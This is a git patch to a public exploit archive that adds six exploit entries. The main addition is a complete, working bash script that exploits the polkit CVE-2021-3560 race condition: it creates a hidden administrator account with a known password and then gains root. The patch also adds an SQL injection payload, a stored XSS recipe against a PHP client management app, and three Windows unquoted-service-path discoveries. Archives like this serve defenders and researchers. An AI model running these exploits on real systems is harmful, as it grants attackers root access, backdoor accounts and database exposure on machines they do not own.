From 6406244acc7a53054dfa7ce96cecf2f2f7889d11 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 16 Jun 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-06-16 6 changes to exploits/shellcodes Brother BRPrint Auditor - 'Multiple' Unquoted Service Path SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path Polkit 0.105-26 0.117-2 - Local Privilege Escalation Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS) Client Management System 1.1 - 'Search' SQL Injection --- exploits/linux/local/50011.sh | 71 ++++++++++++++++++++++++++++++++ exploits/php/webapps/50007.txt | 20 +++++++++ exploits/tru64/webapps/50008.txt | 19 +++++++++ exploits/windows/local/50005.txt | 48 +++++++++++++++++++++ exploits/windows/local/50009.txt | 28 +++++++++++++ exploits/windows/local/50010.txt | 30 ++++++++++++++ files_exploits.csv | 6 +++ 7 files changed, 222 insertions(+) create mode 100755 exploits/linux/local/50011.sh create mode 100644 exploits/php/webapps/50007.txt create mode 100644 exploits/tru64/webapps/50008.txt create mode 100644 exploits/windows/local/50005.txt create mode 100644 exploits/windows/local/50009.txt create mode 100644 exploits/windows/local/50010.txt diff --git a/exploits/linux/local/50011.sh b/exploits/linux/local/50011.sh new file mode 100755 index 000000000..9a2207d83 --- /dev/null +++ b/exploits/linux/local/50011.sh @@ -0,0 +1,71 @@ +# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation +# Date: 06/11/2021 +# Exploit Author: J Smith (CadmusofThebes) +# Vendor Homepage: https://www.freedesktop.org/ +# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html +# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora) +# Tested on: Ubuntu 20.04, Fedora 33 +# CVE: CVE-2021-3560 +# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/ + +#!/bin/bash + +# Set the name and display name +userName="hacked" +realName="hacked" + +# Set the account as an administrator +accountType=1 + +# Set the password hash for 'password' and password hint +password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB' +passHint="password" + +# Check Polkit version +polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9) +if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then + echo "[*] Vulnerable version of polkit found" +else + echo "[!] WARNING: Version of polkit might not vulnerable" +fi + +# Validate user is running in SSH instead of desktop terminal +if [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then + echo "[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts" + exit +fi + +# Test the dbus-send timing to load into exploit +echo "[*] Determining dbus-send timing" +realTime=$( TIMEFORMAT="%R"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d " " -f6 ) +halfTime=$(echo "scale=3;$realTime/2" | bc) + +# Check for user first in case previous run of script failed on password set +if id "$userName" &>/dev/null; then + userid=$(id -u $userName) + echo "[*] New user $userName already exists with uid of $userid" +else + userid="" + echo "[*] Attempting to create account" + while [[ $userid == "" ]] + do + dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null + if id "$userName" &>/dev/null; then + userid=$(id -u $userName) + echo "[*] New user $userName created with uid of $userid" + fi + done +fi + +# Add the password to /etc/shadow +echo "[*] Adding password to /etc/shadow" +x=0 +while [ $x -lt 100 ] +do + dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null + x=$(($x + 1)) +done + +echo "[*] Exploit complete! If the password does not work, run the exploit again" +echo "" +echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access" \ No newline at end of file diff --git a/exploits/php/webapps/50007.txt b/exploits/php/webapps/50007.txt new file mode 100644 index 000000000..ef601615f --- /dev/null +++ b/exploits/php/webapps/50007.txt @@ -0,0 +1,20 @@ +# Exploit Title: Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS) +# Date: 14 June 2021 +# Exploit Author: BHAVESH KAUL +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ +# Version: 1.1 +# Tested on: Server: XAMPP + +# Description # + +Client Management System 1.1 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. + +# Proof of Concept (PoC) : Exploit # + +1) Goto: http://localhost/clientms/admin/index.php +2) Login as admin using test credentials: admin/Test@123 +3) Goto: http://localhost/clientms/admin/admin-profile.php +4) Enter the following payload in the user name field: +5) Click on Update +6) Our payload is fired and stored \ No newline at end of file diff --git a/exploits/tru64/webapps/50008.txt b/exploits/tru64/webapps/50008.txt new file mode 100644 index 000000000..eacf45048 --- /dev/null +++ b/exploits/tru64/webapps/50008.txt @@ -0,0 +1,19 @@ +# Exploit Title: Client Management System 1.1 - 'Search' SQL Injection +# Date: 14 June 2021 +# Exploit Author: BHAVESH KAUL +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ +# Version: 1.1 +# Tested on: Server: XAMPP + +# Description # + +Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization. + +# Proof of Concept (PoC) : Exploit # + +1) Goto: http://localhost/clientms/admin/index.php +2) Login as admin using test credentials: admin/Test@123 +3) Goto: http://localhost/clientms/admin/search-invoices.php +4) Enter the following payload in the search field: ' OR 'x'='x +5) All results are showed instead of none ==> SQL Injection success \ No newline at end of file diff --git a/exploits/windows/local/50005.txt b/exploits/windows/local/50005.txt new file mode 100644 index 000000000..f9b9dc1ed --- /dev/null +++ b/exploits/windows/local/50005.txt @@ -0,0 +1,48 @@ +# Exploit Title: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 14-06-2021 +# Vendor Homepage: https://support.brother.com/ +# Software Links: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=dcp7060d_all&os=10013&dlid=dlf102753_000&flang=4&type3=214 +# Tested Version: 3.0.7 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ +BrPrAuSvc BrAuSvc C:\Program Files +(x86)\Brother\BRPrintAuditor\Brsvau3a.exe Auto + +Brother BRPrintAuditor Agent BRPA_Agent C:\Program Files +(x86)\Brother\BRPrintAuditor\BRAgtSrv.exe Auto + +C:\Users\IEUser>sc qc BrAuSvc +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: BrAuSvc + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\Brother\BRPrintAuditor\Brsvau3a.exe + GRUPO_ORDEN_CARGA : BrotherSplGroup + ETIQUETA : 0 + NOMBRE_MOSTRAR : BrPrAuSvc + DEPENDENCIAS : Spooler + NOMBRE_INICIO_SERVICIO: LocalSystem + +C:\Users\IEUser>sc qc BRPA_Agent +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: BRPA_Agent + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\Brother\BRPrintAuditor\BRAgtSrv.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Brother BRPrintAuditor Agent + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50009.txt b/exploits/windows/local/50009.txt new file mode 100644 index 000000000..7d0e75024 --- /dev/null +++ b/exploits/windows/local/50009.txt @@ -0,0 +1,28 @@ +# Exploit Title: SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 14-06-2021 +# Vendor Homepage: https://www.sysgauge.com +# Software Link: https://www.sysgauge.com/setups/sysgaugesrv_setup_v7.9.18.exe +# Tested Version: 7.9.18 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +C:\>sc qc "SysGauge Server" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: SysGauge Server + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\SysGauge +Server\bin\sysgaus.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : SysGauge Server + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50010.txt b/exploits/windows/local/50010.txt new file mode 100644 index 000000000..f1999dff9 --- /dev/null +++ b/exploits/windows/local/50010.txt @@ -0,0 +1,30 @@ +# Exploit Title: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 14-06-2021 +# Vendor Homepage: https://brother.com +# Software Link: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=ads1000w_us&os=10013&dlid=dlf002778_000&flang=4&type3=46 +# Tested Version: 1.38 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ +Brother BRAgent WBA_Agent_Client C:\Program Files +(x86)\Brother\BRAgent\BRAgtSrv.exe Auto + +C:\>sc qc WBA_Agent_Client +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: WBA_Agent_Client + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files +(x86)\Brother\BRAgent\BRAgtSrv.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Brother BRAgent + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 09daf1acb..5574d20ec 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11364,6 +11364,10 @@ id,file,description,date,author,type,platform,port 49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",2021-06-14,"Erick Galindo",local,windows, 49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows, 50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows, +50005,exploits/windows/local/50005.txt,"Brother BRPrint Auditor - 'Multiple' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows, +50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows, +50010,exploits/windows/local/50010.txt,"Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows, +50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44159,3 +44163,5 @@ id,file,description,date,author,type,platform,port 49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",2021-06-14,"BHAVESH KAUL",webapps,php, 49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",2021-06-14,"Mert Daş",webapps,php, 49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php, +50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",2021-06-15,"BHAVESH KAUL",webapps,php, +50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,